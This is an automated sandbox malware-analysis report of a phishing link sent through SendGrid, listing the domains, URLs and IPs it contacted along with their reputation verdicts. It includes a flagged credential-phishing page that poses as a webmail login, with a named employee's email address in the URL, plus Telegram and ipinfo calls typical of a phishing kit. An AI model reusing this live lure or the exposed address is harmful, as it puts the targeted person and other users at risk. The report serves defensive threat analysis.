https://www.agriparadigma.it/lab-services/physico-chemical-analyses/0%Avira URL Cloudsafe
https://www.agriparadigma.it/wp-content/themes/tentamus/dist/styles/main.css?ver=20012110400%Avira URL Cloudsafe
https://www.agriparadigma.it/lab-services/microbiology-and-molecular-biology/0%Avira URL Cloudsafe
https://www.agriparadigma.it/labore/#0%Avira URL Cloudsafe
https://www.agriparadigma.it/accreditations/0%Avira URL Cloudsafe
https://www.agriparadigma.it/wp-content/themes/tentamus/assets/scripts/amcharts4/worldLow.js0%Avira URL Cloudsafe
https://www.agriparadigma.it/wp-content/plugins/tailor/assets/js/dist/frontend.min.js?ver=1.8.20%Avira URL Cloudsafe
https://www.agriparadigma.it/wp-content/plugins/lab-finder/labs.json?v=17327899789720%Avira URL Cloudsafe
https://www.agriparadigma.it/en/0%Avira URL Cloudsafe
https://www.agriparadigma.it/contattaci/0%Avira URL Cloudsafe
https://www.agriparadigma.it/wp-content/themes/tentamus/assets/fonts/barlow500.woff20%Avira URL Cloudsafe
https://www.agriparadigma.it/wp-json/0%Avira URL Cloudsafe
https://www.agriparadigma.it/wp-content/themes/tentamus-labor/images/MemberTag.png);0%Avira URL Cloudsafe
https://www.agriparadigma.it/wp-includes/js/imagesloaded.min.js?ver=4.1.40%Avira URL Cloudsafe
https://www.agriparadigma.it/wp-content/uploads/sites/71/2017/02/HeaderImage_0005_Agriculture-150x150%Avira URL Cloudsafe
https://www.agriparadigma.it/wp-content/plugins/multilingual-press/assets/css/frontend.min.css?ver=15663056750%Avira URL Cloudsafe
https://www.agriparadigma.it/wp-content/plugins/tailor/assets/js/dist/vendor/shuffle.min.js?ver=1.8.0%Avira URL Cloudsafe
https://www.agriparadigma.it/responsabilita-amministrativa-dimpresa-ai-sensi-del-dlgs-231-01/0%Avira URL Cloudsafe
https://www.agriparadigma.it/privacy/0%Avira URL Cloudsafe
https://www.agriparadigma.it/wp-content/uploads/sites/71/2018/04/0001_02-150x150.jpg0%Avira URL Cloudsafe
https://www.agriparadigma.it/wp-content/uploads/sites/71/2018/04/0000_03.jpg0%Avira URL Cloudsafe
https://www.agriparadigma.it/lab-services/water-land-for-crop-cultivation/0%Avira URL Cloudsafe
https://www.agriparadigma.it/wp-content/plugins/lab-finder/lang/locale-0%Avira URL Cloudsafe
https://www.agriparadigma.it/wp-content/themes/tentamus-labor/images/MemberTagActive.png);0%Avira URL Cloudsafe
https://www.agriparadigma.it/wp-content/plugins/tailor/assets/js/dist/vendor/modernizr.min.js?ver=1.0%Avira URL Cloudsafe
https://www.agriparadigma.it/wp-json/wp/v2/pages/70%Avira URL Cloudsafe
https://www.agriparadigma.it/wp-content/plugins/wpcf7-redirect/build/css/wpcf7-redirect-frontend.min.css?ver=1.10%Avira URL Cloudsafe
https://www.agriparadigma.it/#/schema/WebSite0%Avira URL Cloudsafe
https://www.agriparadigma.it/wp-content/plugins/tailor/assets/css/ie.min.css?ver=1.8.20%Avira URL Cloudsafe
https://www.agriparadigma.it/lab-services/microbiology-molecular-biology/0%Avira URL Cloudsafe
https://www.agriparadigma.it/wp-content/themes/tentamus/dist/scripts/main.js?ver=20012110400%Avira URL Cloudsafe
https://www.agriparadigma.it/wp-content/plugins/tailor/assets/js/dist/vendor/magnific-popup.min.js?v0%Avira URL Cloudsafe
https://www.agriparadigma.it/wp-content/themes/tentamus-labor/images/MemberTagActiveMobile.png);0%Avira URL Cloudsafe
https://www.agriparadigma.it/wp-content/uploads/sites/71/2018/04/0000_03-150x150.jpg0%Avira URL Cloudsafe
https://www.agriparadigma.it/wp-content/plugins/wpcf7-redirect/build/css/wpcf7-redirect-frontend.min0%Avira URL Cloudsafe
https://www.agriparadigma.it/wp-content/themes/tentamus-labor/images/MemberTagFooter.png?v=2);0%Avira URL Cloudsafe
https://www.agriparadigma.it/xmlrpc.php?rsd0%Avira URL Cloudsafe
https://www.agriparadigma.it/whistleblowing/0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
stackpath.bootstrapcdn.com
104.18.10.207
truefalse
    high
    igacorp.conohawing.com
    118.27.122.26
    truetrue
      unknown
      maxcdn.bootstrapcdn.com
      104.18.11.207
      truefalse
        high
        image.thum.io
        54.226.114.88
        truefalse
          high
          www.tentamus.com
          5.57.42.148
          truefalse
            unknown
            dns.google
            8.8.8.8
            truefalse
              high
              d26p066pn2w0s0.cloudfront.net
              13.227.8.72
              truefalse
                high
                code.jquery.com
                151.101.66.137
                truefalse
                  high
                  cdnjs.cloudflare.com
                  104.17.24.14
                  truefalse
                    high
                    ipinfo.io
                    34.117.59.81
                    truefalse
                      high
                      www.google.com
                      142.250.181.100
                      truefalse
                        high
                        api.telegram.org
                        149.154.167.220
                        truefalse
                          high
                          www.agriparadigma.it
                          5.57.41.119
                          truefalse
                            unknown
                            ka-f.fontawesome.com
                            unknown
                            unknownfalse
                              high
                              kit.fontawesome.com
                              unknown
                              unknownfalse
                                high
                                u48396839.ct.sendgrid.net
                                unknown
                                unknowntrue
                                  unknown
                                  logo.clearbit.com
                                  unknown
                                  unknownfalse
                                    high
                                    NameMaliciousAntivirus DetectionReputation
                                    https://www.agriparadigma.it/wp-content/plugins/lab-finder/lang/locale-it_IT.json?v=1732789977147false
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://www.agriparadigma.it/wp-content/plugins/cookie-notice/js/front.min.js?ver=2.5.4false
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://www.agriparadigma.it/wp-includes/css/classic-themes.min.css?ver=1false
                                    • Avira URL Cloud: safe
                                    unknown
                                    https://code.jquery.com/jquery-3.2.1.slim.min.jsfalse
                                      high
                                      https://www.agriparadigma.it/wp-content/uploads/sites/71/tailor/css/frontend.min.css?ver=1.8.2false
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://www.agriparadigma.it/wp-content/uploads/sites/71/2017/06/AGRI_logo_Plain.jpgfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      https://ipinfo.io/jsonfalse
                                        high
                                        https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.jsfalse
                                          high
                                          https://www.agriparadigma.it/wp-content/plugins/lab-finder/labs.json?v=1732789978972false
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://www.google.com/s2/favicons?domain=?v=BUILD_HASHfalse
                                            high
                                            https://www.agriparadigma.it/wp-content/themes/tentamus/dist/styles/main.css?ver=2001211040false
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://www.agriparadigma.it/wp-content/plugins/tailor/assets/js/dist/frontend.min.js?ver=1.8.2false
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://cdnjs.cloudflare.com/ajax/libs/axios/0.20.0/axios.min.jsfalse
                                              high
                                              https://www.agriparadigma.it/wp-content/themes/tentamus/assets/scripts/amcharts4/worldLow.jsfalse
                                              • Avira URL Cloud: safe
                                              unknown
                                              https://dns.google/resolve?name=agriparadigma.it&type=MXfalse
                                                high
                                                https://www.agriparadigma.it/wp-content/plugins/multilingual-press/assets/css/frontend.min.css?ver=1566305675false
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://igacorp.conohawing.com/secure/auth/web/secure/auth-webmail-web-con-secure-account.html#gianpiero.luciani@agriparadigma.ittrue
                                                  unknown
                                                  https://www.agriparadigma.it/wp-includes/js/imagesloaded.min.js?ver=4.1.4false
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://www.agriparadigma.it/wp-content/uploads/sites/71/2018/04/0000_03.jpgfalse
                                                  • Avira URL Cloud: safe
                                                  unknown
                                                  https://logo.clearbit.com/agriparadigma.itfalse
                                                    high
                                                    https://www.agriparadigma.it/wp-content/plugins/wpcf7-redirect/build/css/wpcf7-redirect-frontend.min.css?ver=1.1false
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://code.jquery.com/jquery-3.1.1.min.jsfalse
                                                      high
                                                      https://www.agriparadigma.it/wp-content/themes/tentamus/dist/scripts/main.js?ver=2001211040false
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://code.jquery.com/jquery-3.3.1.jsfalse
                                                        high
                                                        NameSourceMaliciousAntivirus DetectionReputation
                                                        https://ipinfo.io/missingauthchromecache_110.1.dr, chromecache_139.1.drfalse
                                                          high
                                                          https://www.agriparadigma.it/#/schema/BreadcrumbListchromecache_142.1.drfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://www.tentamus.com/chromecache_142.1.drfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          https://web.archive.org/web/20100324014747/http://blindsignals.com/index.php/2009/07/jquery-delay/chromecache_143.1.dr, chromecache_125.1.drfalse
                                                            high
                                                            https://www.tentamus.comchromecache_142.1.drfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://ka-f.fontawesome.com/releases/v5.15.4/webfonts/free-fa-brands-400.woff)chromecache_117.1.drfalse
                                                              high
                                                              https://html.spec.whatwg.org/multipage/forms.html#concept-fe-disabledchromecache_143.1.dr, chromecache_125.1.drfalse
                                                                high
                                                                https://www.agriparadigma.it/t-magazine/chromecache_142.1.drfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://infra.spec.whatwg.org/#strip-and-collapse-ascii-whitespacechromecache_143.1.dr, chromecache_125.1.drfalse
                                                                  high
                                                                  https://fontawesome.comchromecache_117.1.drfalse
                                                                    high
                                                                    https://github.com/twbs/bootstrap/graphs/contributors)chromecache_171.1.dr, chromecache_175.1.dr, chromecache_126.1.dr, chromecache_101.1.drfalse
                                                                      high
                                                                      https://modernizr.com/download/?-cssanimations-csstransforms-csstransforms3d-csstransitions-prefixedchromecache_149.1.dr, chromecache_131.1.drfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://github.com/jrburke/requirejs/wiki/Updating-existing-libraries#wiki-anonchromecache_143.1.dr, chromecache_125.1.drfalse
                                                                        high
                                                                        https://www.agriparadigma.it/wp-content/themes/tentamus/assets/images/tentamus-marker-dark.svgchromecache_142.1.drfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        http://getbootstrap.com)chromecache_117.1.dr, chromecache_106.1.drfalse
                                                                          high
                                                                          https://bugzilla.mozilla.org/show_bug.cgi?id=687787chromecache_143.1.dr, chromecache_125.1.drfalse
                                                                            high
                                                                            https://bugs.chromium.org/p/chromium/issues/detail?id=470258chromecache_143.1.dr, chromecache_125.1.drfalse
                                                                              high
                                                                              https://hu-manity.co/chromecache_142.1.drfalse
                                                                                high
                                                                                https://kit.fontawesome.com/585b051251.jschromecache_117.1.drfalse
                                                                                  high
                                                                                  https://www.agriparadigma.it/lab-services/physico-chemical-analyses/chromecache_142.1.drfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://www.agriparadigma.it/lab-services/microbiology-and-molecular-biology/chromecache_142.1.drfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://ka-f.fontawesome.com/releases/v5.15.4/webfonts/free-fa-regular-400.woff)chromecache_117.1.drfalse
                                                                                    high
                                                                                    https://www.agriparadigma.it/en/chromecache_142.1.drfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    https://jsperf.com/getall-vs-sizzle/2chromecache_143.1.dr, chromecache_125.1.drfalse
                                                                                      high
                                                                                      https://www.agriparadigma.it/labore/#chromecache_142.1.drfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      https://schema.orgchromecache_142.1.drfalse
                                                                                        high
                                                                                        https://www.agriparadigma.it/accreditations/chromecache_142.1.drfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        https://ka-f.fontawesome.com/releases/v5.15.4/webfonts/free-fa-brands-400.eot?#iefix)chromecache_117.1.drfalse
                                                                                          high
                                                                                          https://www.agriparadigma.it/contattaci/chromecache_142.1.drfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          unknown
                                                                                          https://jquery.com/chromecache_143.1.dr, chromecache_125.1.drfalse
                                                                                            high
                                                                                            https://www.agriparadigma.it/wp-content/themes/tentamus/assets/fonts/barlow500.woff2chromecache_142.1.drfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            https://www.agriparadigma.it/wp-json/chromecache_142.1.drfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            https://www.agriparadigma.it/wp-content/uploads/sites/71/2017/02/HeaderImage_0005_Agriculture-150x15chromecache_142.1.drfalse
                                                                                            • Avira URL Cloud: safe
                                                                                            unknown
                                                                                            https://ka-f.fontawesome.com/releases/v5.15.4/webfonts/free-fa-solid-900.ttf)chromecache_117.1.drfalse
                                                                                              high
                                                                                              https://github.com/twbs/bootstrap/blob/master/LICENSE)chromecache_117.1.dr, chromecache_171.1.dr, chromecache_106.1.dr, chromecache_175.1.dr, chromecache_126.1.dr, chromecache_101.1.drfalse
                                                                                                high
                                                                                                https://sizzlejs.com/chromecache_143.1.dr, chromecache_125.1.drfalse
                                                                                                  high
                                                                                                  https://www.agriparadigma.it/wp-content/plugins/tailor/assets/js/dist/vendor/shuffle.min.js?ver=1.8.chromecache_142.1.drfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  https://www.agriparadigma.it/wp-content/themes/tentamus-labor/images/MemberTag.png);chromecache_142.1.drfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  https://ka-f.fontawesome.com/releases/v5.15.4/webfonts/free-fa-regular-400.woff2)chromecache_117.1.drfalse
                                                                                                    high
                                                                                                    https://bugs.jquery.com/ticket/12359chromecache_143.1.dr, chromecache_125.1.drfalse
                                                                                                      high
                                                                                                      https://www.agriparadigma.it/responsabilita-amministrativa-dimpresa-ai-sensi-del-dlgs-231-01/chromecache_142.1.drfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      https://www.agriparadigma.it/privacy/chromecache_142.1.drfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      https://youtu.be/5ZRZkSZRn3Achromecache_142.1.drfalse
                                                                                                        high
                                                                                                        https://fontawesome.com/license/freechromecache_117.1.drfalse
                                                                                                          high
                                                                                                          https://www.agriparadigma.it/wp-content/uploads/sites/71/2018/04/0001_02-150x150.jpgchromecache_142.1.drfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          https://github.com/jquery/jquery/pull/557)chromecache_143.1.dr, chromecache_125.1.drfalse
                                                                                                            high
                                                                                                            https://www.agriparadigma.it/wp-content/themes/tentamus-labor/images/MemberTagActive.png);chromecache_142.1.drfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            https://www.agriparadigma.it/wp-content/plugins/lab-finder/lang/locale-chromecache_142.1.drfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            unknown
                                                                                                            https://bugs.chromium.org/p/chromium/issues/detail?id=378607chromecache_143.1.dr, chromecache_125.1.drfalse
                                                                                                              high
                                                                                                              https://www.agriparadigma.it/wp-json/wp/v2/pages/7chromecache_142.1.drfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              https://www.agriparadigma.it/wp-content/plugins/tailor/assets/js/dist/vendor/modernizr.min.js?ver=1.chromecache_142.1.drfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              https://www.agriparadigma.it/lab-services/water-land-for-crop-cultivation/chromecache_142.1.drfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              https://www.agriparadigma.it/wp-content/plugins/tailor/assets/css/ie.min.css?ver=1.8.2chromecache_142.1.drfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              https://www.agriparadigma.it/#/schema/WebSitechromecache_142.1.drfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              https://drafts.csswg.org/cssom/#resolved-valueschromecache_143.1.dr, chromecache_125.1.drfalse
                                                                                                                high
                                                                                                                https://bugs.chromium.org/p/chromium/issues/detail?id=589347chromecache_143.1.dr, chromecache_125.1.drfalse
                                                                                                                  high
                                                                                                                  https://www.agriparadigma.it/lab-services/microbiology-molecular-biology/chromecache_142.1.drfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  https://html.spec.whatwg.org/multipage/syntax.html#attributes-2chromecache_143.1.dr, chromecache_125.1.drfalse
                                                                                                                    high
                                                                                                                    https://promisesaplus.com/#point-59chromecache_143.1.dr, chromecache_125.1.drfalse
                                                                                                                      high
                                                                                                                      https://promisesaplus.com/#point-57chromecache_143.1.dr, chromecache_125.1.drfalse
                                                                                                                        high
                                                                                                                        https://github.com/eslint/eslint/issues/3229chromecache_143.1.dr, chromecache_125.1.drfalse
                                                                                                                          high
                                                                                                                          https://getbootstrap.com/)chromecache_171.1.dr, chromecache_126.1.drfalse
                                                                                                                            high
                                                                                                                            https://www.agriparadigma.it/wp-content/uploads/sites/71/2018/04/0000_03-150x150.jpgchromecache_142.1.drfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            unknown
                                                                                                                            https://www.google.com/s2/favicons?domain=chromecache_117.1.drfalse
                                                                                                                              high
                                                                                                                              https://promisesaplus.com/#point-54chromecache_143.1.dr, chromecache_125.1.drfalse
                                                                                                                                high
                                                                                                                                https://html.spec.whatwg.org/multipage/scripting.html#selector-disabledchromecache_143.1.dr, chromecache_125.1.drfalse
                                                                                                                                  high
                                                                                                                                  http://fontawesome.io/licensechromecache_106.1.drfalse
                                                                                                                                    high
                                                                                                                                    https://www.agriparadigma.it/wp-content/plugins/tailor/assets/js/dist/vendor/magnific-popup.min.js?vchromecache_142.1.drfalse
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    unknown
                                                                                                                                    https://www.agriparadigma.it/wp-content/themes/tentamus-labor/images/MemberTagActiveMobile.png);chromecache_142.1.drfalse
                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                    unknown
                                                                                                                                    https://jquery.org/licensechromecache_143.1.dr, chromecache_125.1.drfalse
                                                                                                                                      high
                                                                                                                                      https://www.agriparadigma.it/wp-content/themes/tentamus-labor/images/MemberTagFooter.png?v=2);chromecache_142.1.drfalse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      unknown
                                                                                                                                      https://www.agriparadigma.it/wp-content/plugins/wpcf7-redirect/build/css/wpcf7-redirect-frontend.minchromecache_142.1.drfalse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      unknown
                                                                                                                                      https://www.agriparadigma.it/xmlrpc.php?rsdchromecache_142.1.drfalse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      unknown
                                                                                                                                      https://www.agriparadigma.it/whistleblowing/chromecache_142.1.drfalse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      unknown
                                                                                                                                      https://getbootstrap.com)chromecache_175.1.dr, chromecache_101.1.drfalse
                                                                                                                                        high
                                                                                                                                        https://bugs.webkit.org/show_bug.cgi?id=137337chromecache_143.1.dr, chromecache_125.1.drfalse
                                                                                                                                          high
                                                                                                                                          • No. of IPs < 25%
                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                          • 75% < No. of IPs
                                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                          5.57.41.119
                                                                                                                                          www.agriparadigma.itGermany
                                                                                                                                          50372PLANETARYNETWORKSDEfalse
                                                                                                                                          104.18.10.207
                                                                                                                                          stackpath.bootstrapcdn.comUnited States
                                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                                          54.226.114.88
                                                                                                                                          image.thum.ioUnited States
                                                                                                                                          14618AMAZON-AESUSfalse
                                                                                                                                          151.101.130.137
                                                                                                                                          unknownUnited States
                                                                                                                                          54113FASTLYUSfalse
                                                                                                                                          8.8.8.8
                                                                                                                                          dns.googleUnited States
                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                          149.154.167.220
                                                                                                                                          api.telegram.orgUnited Kingdom
                                                                                                                                          62041TELEGRAMRUfalse
                                                                                                                                          13.227.8.72
                                                                                                                                          d26p066pn2w0s0.cloudfront.netUnited States
                                                                                                                                          16509AMAZON-02USfalse
                                                                                                                                          151.101.66.137
                                                                                                                                          code.jquery.comUnited States
                                                                                                                                          54113FASTLYUSfalse
                                                                                                                                          5.57.42.148
                                                                                                                                          www.tentamus.comGermany
                                                                                                                                          50372PLANETARYNETWORKSDEfalse
                                                                                                                                          104.17.24.14
                                                                                                                                          cdnjs.cloudflare.comUnited States
                                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                                          167.89.123.16
                                                                                                                                          unknownUnited States
                                                                                                                                          11377SENDGRIDUSfalse
                                                                                                                                          34.117.59.81
                                                                                                                                          ipinfo.ioUnited States
                                                                                                                                          139070GOOGLE-AS-APGoogleAsiaPacificPteLtdSGfalse
                                                                                                                                          142.250.181.100
                                                                                                                                          www.google.comUnited States
                                                                                                                                          15169GOOGLEUSfalse
                                                                                                                                          104.18.11.207
                                                                                                                                          maxcdn.bootstrapcdn.comUnited States
                                                                                                                                          13335CLOUDFLARENETUSfalse
                                                                                                                                          239.255.255.250
                                                                                                                                          unknownReserved
                                                                                                                                          unknownunknownfalse
                                                                                                                                          118.27.122.26
                                                                                                                                          igacorp.conohawing.comJapan7506INTERQGMOInternetIncJPtrue
                                                                                                                                          13.227.8.47
                                                                                                                                          unknownUnited States
                                                                                                                                          16509AMAZON-02USfalse
                                                                                                                                          IP
                                                                                                                                          192.168.2.4
                                                                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                                                                          Analysis ID:1564492
                                                                                                                                          Start date and time:2024-11-28 11:31:05 +01:00
                                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                                          Overall analysis duration:0h 3m 16s
                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                          Report type:full
                                                                                                                                          Cookbook file name:browseurl.jbs
                                                                                                                                          Sample URL:https://u48396839.ct.sendgrid.net/ls/click?upn=u001.6YeAQ6CJdNBv-2FudCmnBUfnGDeiTDEbkJBDYPt6L9zLs-2FLsak6B-2FHJOeuaA20CRyj4ymcnZhEANFrmmsKVXf7lykKGGim9NKe15FTuMOZuNBEFww2OP8BGALV3hzGu43iFj3whu7ElN-2FNYQWfEnFZNtXik-2Bc8xYTdlDDi-2B43g3xWfoVMN9Dsem2IaNiiX-2B-2BZ0QUoG_EefQjaPBlm3j-2F4SdpslfvAk7fHMHOXJ7LweRGvhfSEmfDfe568-2FY-2BOLHESUZOtre1SJ0b0hpgZyE9nNkk5TdPOPC4tMbl8SiWrItsarfSJPs2UVOaCUP5NH54Bsd5iepHuriwvocK8ytgM3DUdP-2FGahP9TgWP8NK8XkzPu1yHstDO59EN9oezB0Bvcj4q1reEb5SVFPJB790ukEQpDzKhgmB7njVUkFC8cDwRBiYm4JeBTEVj-2FO9L-2B-2B-2FOmACAmxhX3ZwjKn-2F44onZNgScafSE7DBg-2BaKyUPEhIs0htUoWnblk2BMfXpJIrTjI4RRPPL3aYkpTlROjrttDT-2FsPXJXV6Ht5SRUu-2B0FMc-2F6UTXOUHRIAToTaXExoh-2BhOHngBDGdH-2FjIVKS7GHuJm-2FScM7fL8YyMYHIc3ZF3zj-2FrNo1yxz6qQNvNwYKE88E7ss0Of03GH-2FJ0B8fjyNmYGjPzU42L4WTkis-2FCNDcoVJ6gJCIZpmjB42-2FzDW6h-2FUREH0NUo2OPfZ9i8VYJz7QmCHLGmxdxD04Jz41PYtN7DaspcbsjIDanjiifLEQrLEWmHGBUFW4S8xlKCRj6eGsM5ZaDHWshSLBdAzDSyuonhuBxtuYLeNVHermIaoXD85egwdLJYANewTDecNDoTikVJ8mQdl7ZtnugAlt3ha0w0KmdiGihn6nvMrhhJrSgrE-2B65pLabznZrU0JRBQYA244iDFukcakZMIzjlzqr9piWLEWATx3NZaoZsiDxjNPIcS-2BPZq07eqXM1Ulzf-2FqkjGpcDoFG-2FrwE0q08CJl0HkI1XntIga1RDU5EZi756rrs6KbGhi0n0UYyAPMzcKJ1GSCyUZR-2FjEg-2FvBTzHO-2FOloWzctFMjjbt8OJhXkQtpwpSzQ5WMHPnqPpU8mVl6-2F8VDi2j4ulsfLIYkFMQxs-2FFnpoz7jaZyont10-3D
                                                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                          Number of analysed new started processes analysed:8
                                                                                                                                          Number of new started drivers analysed:0
                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                          Number of injected processes analysed:0
                                                                                                                                          Technologies:
                                                                                                                                          • HCA enabled
                                                                                                                                          • EGA enabled
                                                                                                                                          • AMSI enabled
                                                                                                                                          Analysis Mode:default
                                                                                                                                          Analysis stop reason:Timeout
                                                                                                                                          Detection:MAL
                                                                                                                                          Classification:mal64.phis.troj.win@19/132@54/18
                                                                                                                                          EGA Information:Failed
                                                                                                                                          HCA Information:
                                                                                                                                          • Successful, ratio: 100%
                                                                                                                                          • Number of executed functions: 0
                                                                                                                                          • Number of non-executed functions: 0
                                                                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                                                          • Excluded IPs from analysis (whitelisted): 74.125.205.84, 172.217.19.238, 216.58.208.227, 34.104.35.123, 172.217.19.234, 104.18.40.68, 172.64.147.188, 172.217.19.170, 172.217.17.74, 2.22.50.131, 172.217.21.42, 142.250.181.106, 216.58.208.234, 172.217.19.202, 142.250.181.138, 172.217.17.42, 142.250.181.74, 172.217.19.10, 104.21.26.223, 172.67.139.119, 192.229.221.95, 172.217.17.35
                                                                                                                                          • Excluded domains from analysis (whitelisted): kit.fontawesome.com.cdn.cloudflare.net, fonts.googleapis.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, ka-f.fontawesome.com.cdn.cloudflare.net, slscr.update.microsoft.com, otelrules.azureedge.net, ajax.googleapis.com, fonts.gstatic.com, ctldl.windowsupdate.com, clientservices.googleapis.com, fe3cr.delivery.mp.microsoft.com, clients2.google.com, ocsp.digicert.com, edgedl.me.gvt1.com, update.googleapis.com, clients.l.google.com
                                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                          • VT rate limit hit for: https://u48396839.ct.sendgrid.net/ls/click?upn=u001.6YeAQ6CJdNBv-2FudCmnBUfnGDeiTDEbkJBDYPt6L9zLs-2FLsak6B-2FHJOeuaA20CRyj4ymcnZhEANFrmmsKVXf7lykKGGim9NKe15FTuMOZuNBEFww2OP8BGALV3hzGu43iFj3whu7ElN-2FNYQWfEnFZNtXik-2Bc8xYTdlDDi-2B43g3xWfoVMN9Dsem2IaNiiX-2B-2BZ0QUoG_EefQjaPBlm3j-2F4SdpslfvAk7fHMHOXJ7LweRGvhfSEmfDfe568-2FY-2BOLHESUZOtre1SJ0b0hpgZyE9nNkk5TdPOPC4tMbl8SiWrItsarfSJPs2UVOaCUP5NH54Bsd5iepHuriwvocK8ytgM3DUdP-2FGahP9TgWP8NK8XkzPu1yHstDO59EN9oezB0Bvcj4q1reEb5SVFPJB790ukEQpDzKhgmB7njVUkFC8cDwRBiYm4JeBTEVj-2FO9L-2B-2B-2FOmACAmxhX3ZwjKn-2F44onZNgScafSE7DBg-2BaKyUPEhIs0htUoWnblk2BMfXpJIrTjI4RRPPL3aYkpTlROjrttDT-2FsPXJXV6Ht5SRUu-2B0FMc-2F6UTXOUHRIAToTaXExoh-2BhOHngBDGdH-2FjIVKS7GHuJm-2FScM7fL8YyMYHIc3ZF3zj-2FrNo1yxz6qQNvNwYKE88E7ss0Of03GH-2FJ0B8fjyNmYGjPzU42L4WTkis-2FCNDcoVJ6gJCIZpmjB42-2FzDW6h-2FUREH0NUo2OPfZ9i8VYJz7QmCHLGmxdxD04Jz41PYtN7DaspcbsjIDanjiifLEQrLEWmHGBUFW4S8xlKCRj6eGsM5ZaDHWshSLBdAzDSyuonhuBxtuYLeNVHermIaoXD85egwdLJYANewTDecNDoTikVJ8mQdl7ZtnugAlt3ha0w0KmdiGihn6nvMrhhJrSgr
                                                                                                                                          No simulations
                                                                                                                                          No context
                                                                                                                                          No context
                                                                                                                                          No context
                                                                                                                                          No context
                                                                                                                                          No context
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:ASCII text, with very long lines (48664)
                                                                                                                                          Category:downloaded
                                                                                                                                          Size (bytes):48944
                                                                                                                                          Entropy (8bit):5.272507874206726
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:768:9VG5R15WbHVKZrycEHSYro34CrSLB6WU/6DqBf4l1B:9VIRuo53XiwWTvl1B
                                                                                                                                          MD5:14D449EB8876FA55E1EF3C2CC52B0C17
                                                                                                                                          SHA1:A9545831803B1359CFEED47E3B4D6BAE68E40E99
                                                                                                                                          SHA-256:E7ED36CEEE5450B4243BBC35188AFABDFB4280C7C57597001DE0ED167299B01B
                                                                                                                                          SHA-512:00D9069B9BD29AD0DAA0503F341D67549CCE28E888E1AFFD1A2A45B64A4C1BC460D81CFC4751857F991F2F4FB3D2572FD97FCA651BA0C2B0255530209B182F22
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          URL:https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js
